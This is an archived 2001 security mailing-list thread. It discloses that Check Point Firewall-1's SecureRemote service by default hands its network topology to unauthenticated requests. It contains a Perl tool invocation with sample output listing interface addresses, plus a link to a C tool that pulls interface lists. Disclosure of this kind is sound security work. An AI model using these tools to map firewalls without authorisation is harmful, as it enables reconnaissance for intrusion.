Vulnerability Development mailing list archives

RE: Firewall-1 Information leak

From: "Jim Becher" <jim () becher net>
Date: Tue, 17 Jul 2001 22:31:49 -0500
As long as we are sharing information leakage stuff for Firewall-1...

I wrote something back in 1998 (I think) that would retrieve the interfaces
off of a Firewall-1, and write them to a file called ints.<IP address>.  I
have updated for v4.1.  I believe it will retrieve all the interfaces even
if topology downloads are restricted to authenticated requests.

If any part of the code is well-written, that's the part I ripped from
someone else's code.  If any part of the code sucks, that's mine.  ;)

Anyway, the code is located: www.becher.net/~jim/getints.c.


-bech

-----Original Message-----
From: Haroon Meer [mailto:haroon () sensepost com]
Sent: Tuesday, July 17, 2001 8:25 PM
To: vuln-dev () securityfocus com
Subject: Firewall-1 Information leak



Hi.

Checkpoint Firewall-1 makes use of a piece of software called SecureRemote
to create encrypted sessions between users and FW-1 modules. Before remote
users are able to communicate with internal hosts, a network topology of
the protected network is downloaded to the client. While newer versions of
the FW-1 software have the ability to restrict these downloads to only
authenticated sessions, the default setting allows unauthenticated
requests to be honoured. This gives a potential attacker a wealth of
information including ip addresses, network masks (and even friendly
descriptions)

The attached file will connect to the firewall, and download the
toplogy (if SecureRemote is running)
(it is a tiny perl file, which needs only Socket, so avoids the hassle of
having to install the SecureRemote client <or booting windows> to test a
firewall-1)

--snip--
SensePost# perl sr.pl firewall.victim.com
Testing  on port 256
        :val (
                :reply (
                        : (-SensePost-dotcom-.hal9000-19.3.167.186
                                :type (gateway)
                                :is_fwz (true)
                                :is_isakmp (true)
                                :certificates ()
                                :uencapport (2746)
                                :fwver (4.1)
                                :ipaddr (19.3.167.186)
                                :ipmask (255.255.255.255)
                                :resolve_multiple_interfaces ()
                                :ifaddrs (
                                        : (16.3.167.186)
                                        : (12.20.240.1)
                                        : (16.3.170.1)
                                        : (29.203.37.97)
                                )
                                :firewall (installed)
                                :location (external)
                                :keyloc (remote)
                                :userc_crypt_ver (1)
                                :keymanager (
                                        :type (refobj)
                                        :refname ("#_-SensePost-dotcom-")

)                               :name
                                (-SensePost-dotcom-Neo16.3.167.189)
                                                :type (gateway)
                                                :ipaddr (172.29.0.1)
                                                :ipmask (255.255.255.255)
                                        )

--snip--

Haroon Meer
+27 837866637
haroon () sensepost com
http://www.sensepost.com
Current thread:

Firewall-1 Information leak Haroon Meer (Jul 17)
- RE: Firewall-1 Information leak Jim Becher (Jul 17)
  - RE: Firewall-1 Information leak Jan H. van Gils (Jul 18)